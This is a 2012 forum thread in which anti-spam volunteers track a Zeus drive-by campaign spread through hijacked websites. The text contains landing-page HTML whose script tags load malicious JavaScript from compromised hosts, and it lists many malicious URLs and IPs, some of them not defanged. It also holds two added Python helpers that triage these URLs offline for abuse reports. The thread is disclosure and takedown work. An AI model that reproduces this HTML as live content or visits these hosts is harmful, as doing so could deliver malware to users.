Numerous malware drive by attempts

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Postby spamislame » Thu Mar 22, 2012 6:18 pm

In the past three weeks I've seen a sudden rush of all manner of fake notifications pushing URLs of hijacked servers which attempt to perform several types of malware exploitation.

The messages are always the same kind of format:

- Fake notification from a company. Lately it's been mostly Linkedin notices (some fake person needing a recommendation, etc.)
- Several links each claiming to be for a different thing (Read more, contact us, unsubscribe)
- Each link is a distinct hijacked server.

The hijacked servers always have a randomly named subdirectory and an index file, e.g.:

    http://acte-firma-offshore.ro/Nfy7BLd8/index.html

When you go to one of the hijacked server links, you see a message that says "WAIT PLEASELoading...".

If you view source on these individual pages, you see that a string of *other* hijacked servers is supplying the malicious JavaScript code:

    <html>
    <h1>WAIT PLEASE</h1>
    <h3>Loading...</h3>
    <script type="text/javascript" src="http://mrsmakeit.com/9jrgDjED/js.js"></script>
    <script type="text/javascript" src="http://myparacord.com/cxW8X8xp/js.js"></script>
    <script type="text/javascript" src="http://thebestguide1.com/arKwG4pE/js.js"></script>
    <script type="text/javascript" src="http://www.extrhema.com.br/cVspcegd/js.js"></script>
    <script type="text/javascript" src="http://www.industriacaxiense.com.br/HLAeMSAd/js.js"></script>
    </html>

Again: randomly named directory and a js file.

So there's an automated process out there that's doing this to (so far) dozens of unsecured, abandoned, long forgotten websites.

So far this week I have reported 53 servers, covering the whole gamut of the hijacked servers. Many of these are completely abandoned or hosted by really obscure, what I refer to as "unmanned", ISPs. No contact address works for some of them, or the ones that do go unanswered. I'd say I'm at about a 40% success rate for getting these suspended or secured.

I've created a really basic tool called the Phishing ReporterAtor™ which certainly makes life easier, but there's got to be some better way of notifying these ISPs and hosting companies that criminals have pwned a large number of their servers.

Having said all of this: none of these messages make it past any spam filter at all, via numerous email providers. (Gmail, Yahoo, etc.) So I have to question the overall success of this malware campaign.

Mostly fyi for now but this is becoming an epidemic.

SiL
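As an added example (not SiL's ReporterAtor or any code from this thread), a small Python script that pulls the second-stage js.js hosts out of a saved copy of a "WAIT PLEASE" landing page like the one quoted above, so each hijacked host can be reported without ever loading the scripts. The sample HTML is copied from the post, with one constructed relative script tag added to show what gets ignored.

```python
"""Pull the second-stage js.js hosts out of a saved 'WAIT PLEASE' landing page.

Added example, not the poster's tool: it parses the HTML offline (no fetching)
and keeps only <script src> URLs with the /<8 random chars>/js.js shape seen in
the thread, giving a clean host list per landing page for abuse reports.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the landing-page source quoted in the post, plus one
# relative script tag to show that non-matching sources are ignored.
SAMPLE_HTML = """<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://mrsmakeit.com/9jrgDjED/js.js"></script>
<script type="text/javascript" src="http://myparacord.com/cxW8X8xp/js.js"></script>
<script type="text/javascript" src="/static/jquery.min.js"></script>
</html>"""

# Random 8-character directory followed by js.js, exactly as seen in the thread.
STAGE2_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag; nothing is executed."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def stage2_hosts(html):
    """Return the hosts serving /xxxxxxxx/js.js, in page order, without duplicates."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    hosts = []
    for src in collector.sources:
        parts = urlsplit(src)
        # Only absolute http(s) URLs whose path has the random-directory js.js shape count.
        if parts.scheme in ("http", "https") and parts.hostname and STAGE2_PATH.match(parts.path):
            if parts.hostname not in hosts:
                hosts.append(parts.hostname)
    return hosts


if __name__ == "__main__":
    for host in stage2_hosts(SAMPLE_HTML):
        print(host)
```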

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Mar 22, 2012 10:34 pm

"this is becoming an epidemic"

I attempted to describe some of the malware campaign here:
http://www.mywot.com/en/forum/21464-qai ... -2010-1885

The patterns of the malicious URLs (deceptive landing page, intermediate JavaScript, malware payload) have been easy to spot so far.

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 12:24 am

From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8-character random string in the URL. They are ordered from most frequent (127 hits) to least frequent (1 hit).

SIL, let me know if you need the full URLs for reporting.

Re: Numerous malware drive by attempts

Postby spamislame » Fri Mar 23, 2012 10:51 am

Red Dwarf wrote:SIL, let me know if you need the full URLs for reporting.

Yes please!

SiL

Re: Numerous malware drive by attempts

Postby spamislame » Fri Mar 23, 2012 10:55 am

Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL

Re: Numerous malware drive by attempts

Postby AlphaCentauri » Fri Mar 23, 2012 2:34 pm

As lame as these appear when they're from the wrong bank, I'm sure they hit lots of people who do use the bank being spoofed, and maybe even a few who share access to an account with the sort of person who needs to do a lot of password resets.

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 3:59 pm

spamislame wrote:
Red Dwarf wrote:SIL, let me know if you need the full URLs for reporting.

Yes please!

SiL

1,500 URLs from the past 3 days sent.
:silthumb: < = silthumb!

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 4:22 pm

spamislame wrote:Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL


garwarner wrote:In the very most recent of these "BlackHole to Zeus" malware campaigns, LinkedIn is being imitated. The LinkedIn invitation claims to be from "Your classmate", but guess what happens if you click one of the 820 advertised URLs, each disguised as your "friend's" name?

Yes, it loads several redirectors, and then sends them to a Black Hole Exploit kit that infects the visitor with Zeus!

The format matches exactly: a hacked web server, a random 8-character string, index.html (techie grep pattern "/......../index.html").
garwarner wrote:promocaolilicaetigor.com.br / VJBqqR5H / index.html

BTW, in that particular example - The requested URL /VJBqqR5H was not found on this server.

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 4:44 pm

Here are some of the js.js second level URLs. The usual warnings apply - do not load these
    <script type="text/javascript" src="http://boemelparty.be/vnB4GozT/js.js"></script>
    <script type="text/javascript" src="http://bscert.eu/CAgADsB0/js.js"></script>
    <script type="text/javascript" src="http://chroniquesradios.com/7KnKEoKm/js.js"></script>
    <script type="text/javascript" src="http://nhb.prosixsoftron.in/cJHrkMSb/js.js"></script>
    <script type="text/javascript" src="http://sas.hg.pl/Th5Da66c/js.js"></script>
    <script type="text/javascript" src="http://www.alpine-turkey.com/YfTXsaR5/js.js"></script>
    <script type="text/javascript" src="http://www.frogeen.com/hPPP5CqE/js.js"></script>
    <script type="text/javascript" src="http://www.thedugoutdawgs.com/H5WkxY8X/js.js"></script>
    <script type="text/javascript" src="http://www.vinhthanh.com.vn/8cACpVEr/js.js"></script>


The domains / web servers are
boemelparty.be
bscert.eu
chroniquesradios.com
nhb.prosixsoftron.in
sas.hg.pl
hXXp://www.alpine-turkey.com
hXXp://www.frogeen.com
hXXp://www.thedugoutdawgs.com
hXXp://www.vinhthanh.com.vn


[EDIT] More added

Re: Numerous malware drive by attempts

Postby spamislame » Fri Mar 23, 2012 5:26 pm

I reported around 50 of these so far (both the js.js hosts and the /#########/index.html hosts)

SiL

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Mar 29, 2012 5:29 am

I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment (or just before I posted this) at

hXXp://50.116.50.82/showthread.php?t=d7ad916d1c0396ff

Re: Numerous malware drive by attempts

Postby spamislame » Thu Mar 29, 2012 10:10 am

NotBuyingIt wrote:I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment

...

Or rather: was. :twisted:

SiL

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Mar 29, 2012 12:49 pm

spamislame wrote:Or rather: was. :twisted:

Ah! The botnet domain clearschooner.com (Creation Date: 28-mar-2012) has been suspended; its registrar MONIKER ONLINE SERVICES, INC has set its status to clientHold. Its DNS (monikerdns.net) continues to associate it with IP 50.116.50.82 on the Linode Network in the USA; however the server at that IP address appears to have gone offline. :silthumb:

It may be productive to examine any similarly named domains which were created near the same time as clearschooner.com

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Sat Mar 31, 2012 11:35 am

I believe that the following article refers to some of these drive-by attempts

http://garwarner.blogspot.com/2012/03/u ... lware.html

Canadian translation:

http://garwarner.blogspot.ca/2012/03/us ... lware.html

(Note: The blog will not render properly on an iPad.)

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Apr 05, 2012 12:32 pm

These deceptive URLs (presumably found in spam that, I am guessing, are spoofs of PayPal in this case)

    aluguelciroimoveis.com.br/9ZT4hYfA/index.html
    eltekmuhendislik.com/PX34vf6P/index.html
    erinteltelekom.com.tr/2qkQiMnF/index.html
    estutrans.co.id/zSfdvN78/index.html
    homeartbornova.com/ZQe8w6UJ/index.html

all link to web pages that are coded to load several of these "intermediate" JavaScript files at a time

    demo.auctionsiteforlease.com/u8J3B832/js.js
    guzel-macrame.com/mNv2hTDq/js.js
    osakaledpanel.com/NSAPcnkz/js.js
    scoalapelinie.scienceontheweb.net/AdbZZbva/js.js
    travelhelper.biz/PBzpAEjg/js.js
    usmedicalit.com/ebv60BkK/js.js
    www.walscape.com/Bi7L9NvW/js.js
    yesconvites.com/JcCFzYq7/js.js

The intermediate scripts redirect to a malicious website such as

    50.116.35.146/showthread.php?t=73a07bcb51f4be71
    209.59.218.94/showthread.php?t=73a07bcb51f4be71

The intermediate JavaScript files seem to be revised from time to time to alter the redirection target. Perhaps the repeated revision of the JavaScript files is a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.

[Edit: Add] Today, Dmitry Tarakanov of Kaspersky Lab Poland is using the term polymorphism to generally characterize the frequent code changes in the current set of Zeus malware campaigns.
See http://www.viruslist.pl/weblog.html?weblogid=785
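Added example, not code from any poster in this thread: a Python triage helper that sorts URLs harvested from spam into the three stages described above (the /xxxxxxxx/index.html landing page, the /xxxxxxxx/js.js intermediate script, and the showthread.php?t=... exploit-kit redirect) and ranks hosts per stage by frequency, the way Red Dwarf's list does. The sample URLs are copied from this thread; the defanged hXXp and scheme-less forms are handled because that is how they appear in the posts.

```python
"""Triage URLs harvested from spam into this campaign's stages and rank hosts.

Added example, not any poster's script. It encodes the URL shapes quoted in the
thread: /<8 chars>/index.html landing pages, /<8 chars>/js.js intermediate
scripts and showthread.php?t=<16 hex> exploit-kit redirects; the rest is "other".
"""
import re
from collections import Counter
from urllib.parse import urlsplit

LANDING = re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")
INTERMEDIATE = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")
EXPLOIT_KIT_QUERY = re.compile(r"^t=[0-9a-f]{16}$")  # the showthread.php?t=... form

# Constructed input: URLs copied from this thread, one landing page repeated to
# show the frequency ranking, in the scheme-less and defanged forms posters use.
SAMPLE_URLS = [
    "http://acte-firma-offshore.ro/Nfy7BLd8/index.html",
    "aluguelciroimoveis.com.br/9ZT4hYfA/index.html",
    "http://acte-firma-offshore.ro/Nfy7BLd8/index.html",
    "http://mrsmakeit.com/9jrgDjED/js.js",
    "hXXp://www.frogeen.com/hPPP5CqE/js.js",
    "http://50.116.35.146/showthread.php?t=73a07bcb51f4be71",
]


def classify(url):
    """Return (stage, host) for one URL; accepts defanged hXXp and scheme-less forms."""
    url = url.strip().replace("hXXp://", "http://")
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = parts.hostname or ""
    if LANDING.match(parts.path):
        return "landing", host
    if INTERMEDIATE.match(parts.path):
        return "intermediate", host
    if parts.path.endswith("/showthread.php") and EXPLOIT_KIT_QUERY.match(parts.query):
        return "exploit_kit", host
    return "other", host


def triage(urls):
    """Count hosts per stage; each list is ordered most frequent first."""
    tally = {s: Counter() for s in ("landing", "intermediate", "exploit_kit", "other")}
    for url in urls:
        stage, host = classify(url)
        if host:
            tally[stage][host] += 1
    return {stage: counter.most_common() for stage, counter in tally.items()}
```

Running `triage(SAMPLE_URLS)` gives, per stage, a list of (host, hits) pairs ready to paste into an abuse report; a URL that matches none of the shapes lands in "other" so a benign newsletter link is never reported.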
